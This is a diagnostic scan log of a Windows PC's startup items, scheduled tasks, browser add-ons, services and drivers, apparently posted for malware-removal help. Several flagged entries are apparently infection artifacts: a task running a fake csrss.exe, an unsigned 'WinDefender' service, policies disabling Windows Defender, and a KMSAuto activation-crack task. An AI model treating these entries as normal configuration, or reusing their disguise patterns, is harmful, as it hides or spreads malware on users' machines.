(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-25] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D01F07B-9B7D-4D12-B21E-9C486ACCEC8C} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-25]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-25]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [2079744 2019-11-24] () [File not signed]
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\WINDOWS\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\WINDOWS\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [216544 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-11-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [278344 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
